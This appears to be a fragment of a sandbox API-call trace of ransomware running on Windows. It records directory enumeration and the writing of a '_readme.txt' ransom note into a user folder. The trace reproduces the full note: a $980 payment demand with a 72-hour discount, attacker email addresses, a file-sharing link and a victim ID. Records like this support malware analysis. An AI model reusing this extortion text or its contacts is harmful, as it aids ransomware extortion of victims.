| out: hHeap=0x630000) returned 1 [0094.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0094.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0094.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.213] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1b06900, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1b06900, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.213] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1b06900, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1b06900, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.213] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0094.213] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1b06900, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1b06900, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1b06900, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0094.213] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1b06900, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1b06900, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1b06900, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0094.213] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0094.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5ee0 [0094.214] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0094.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0094.223] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.223] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0094.224] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.224] PathFindFileNameW (pszPath="") returned="" [0094.224] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0094.225] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0094.225] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0094.225] FreeLibrary (hLibModule=0x75670000) returned 1 [0094.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0094.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0094.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fba0 | out: hHeap=0x630000) returned 1 [0094.226] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0094.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fba0 | out: hHeap=0x630000) returned 1 [0094.226] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 0 [0094.227] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0094.227] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0094.227] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0094.227] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79fd8 [0094.227] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0094.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0094.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0094.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0094.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0094.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 